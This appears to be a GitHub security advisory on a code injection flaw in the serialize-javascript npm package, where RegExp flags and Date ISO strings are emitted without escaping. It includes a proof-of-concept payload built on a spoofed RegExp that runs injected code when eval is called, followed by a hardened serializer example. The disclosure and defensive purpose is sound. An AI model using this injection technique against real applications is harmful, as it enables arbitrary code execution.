GHSA-5c6j-r48x-rmvq: Serialize JavaScript is Vulnerable to RCE via RegExp.flags and Date.prototype.toISOString()
The serialize-javascript npm package (versions <= 7.0.2) contains a code injection vulnerability that stems from an incomplete fix for CVE-2020-7660.
While RegExp.source is sanitized, RegExp.flags is interpolated directly into the generated output without escaping. A similar issue exists in Date.prototype.toISOString().
If an attacker can control the input object passed to serialize(), they can inject malicious JavaScript via the flags property of a RegExp object. When the serialized string is later evaluated (via eval, new Function, or <script> tags), the injected code executes.
```javascript
const serialize = require('serialize-javascript');
// Create an object that passes instanceof RegExp with a spoofed .flags
const fakeRegex = Object.create(RegExp.prototype);
Object.defineProperty(fakeRegex, 'source', { get: () => 'x' });
Object.defineProperty(fakeRegex, 'flags', {
  get: () => '"+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"'
});
fakeRegex.toJSON = function() { return '@placeholder'; };
const output = serialize({ re: fakeRegex });
// Output: {"re":new RegExp("x", ""+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"")}
let obj;
eval('obj = ' + output);
console.log(global.PWNED); // "CODE_INJECTION_VIA_FLAGS" — injected code executed!
```
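As an added example (not the serialize-javascript project's code), the hardened counterpart: flags are allow-listed and a genuine RegExp is rebuilt before anything is emitted, and dates are read through Date.prototype.toISOString so an instance-level override is ignored. The spoofed RegExp from the proof of concept above is reconstructed inline as constructed input; function names and the sample values are assumptions.

```javascript
// Added example (not serialize-javascript's code): hardened RegExp/Date emitters.
const FLAGS_ALLOWED = /^[dgimsuvy]*$/;
const ISO_DATE = /^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\.\d{3}Z$/;
// Emit `new RegExp(<source>, <flags>)`; both parts become JSON string literals.
function serializeRegExpSafe(value) {
  const source = String(value.source);
  const flags = String(value.flags);
  // Allow-list the flags; the vulnerable code interpolated them unescaped.
  if (!FLAGS_ALLOWED.test(flags)) {
    throw new TypeError('refusing RegExp flags ' + JSON.stringify(flags));
  }
  // Rebuild a genuine RegExp: the constructor rejects duplicate/unknown flags
  // and the fresh instance carries no spoofed getters or subclass overrides.
  const clean = new RegExp(source, flags);
  return 'new RegExp(' + JSON.stringify(clean.source) + ', ' +
    JSON.stringify(clean.flags) + ')';
}

// Emit `new Date("<ISO 8601>")` through the prototype method, so an own
// toISOString override is ignored and a non-Date `this` throws TypeError.
function serializeDateSafe(value) {
  const iso = Date.prototype.toISOString.call(value); // RangeError if invalid
  if (!ISO_DATE.test(iso)) {
    throw new TypeError('unexpected toISOString output ' + JSON.stringify(iso));
  }
  return 'new Date(' + JSON.stringify(iso) + ')';
}

// Run a serializer and report either its output or the rejection reason.
function attempt(fn, value) {
  try { return { ok: true, out: fn(value) }; }
  catch (e) { return { ok: false, error: e.name + ': ' + e.message }; }
}

// Constructed inputs: a real RegExp, the advisory's spoofed RegExp, a real Date
// whose own toISOString was overridden, and a fake Date with no [[DateValue]].
function demo() {
  const fakeRegex = Object.create(RegExp.prototype);
  Object.defineProperty(fakeRegex, 'source', { get: () => 'x' });
  Object.defineProperty(fakeRegex, 'flags', { get: () => '"+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"' });
  const tamperedDate = new Date(Date.UTC(2024, 0, 2, 3, 4, 5, 6));
  tamperedDate.toISOString = () => 'not-an-iso-date';
  return {
    realRegex: attempt(serializeRegExpSafe, /a"b/gi),
    fakeRegex: attempt(serializeRegExpSafe, fakeRegex),
    tamperedDate: attempt(serializeDateSafe, tamperedDate),
    fakeDate: attempt(serializeDateSafe, Object.create(Date.prototype)),
  };
}
```

Running demo() shows the spoofed RegExp and the fake Date rejected with a TypeError, while the genuine RegExp and the tampered-but-real Date serialize to literals that contain only escaped strings.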
References
- github.com/advisories/GHSA-5c6j-r48x-rmvq
- github.com/advisories/GHSA-hxcc-f52p-wc94
- github.com/yahoo/serialize-javascript
- github.com/yahoo/serialize-javascript/commit/2e609d0a9f4f5b097f0945af88bd45b9c7fb48d9
- github.com/yahoo/serialize-javascript/releases/tag/v7.0.3
- github.com/yahoo/serialize-javascript/security/advisories/GHSA-5c6j-r48x-rmvq
- nvd.nist.gov/vuln/detail/CVE-2020-7660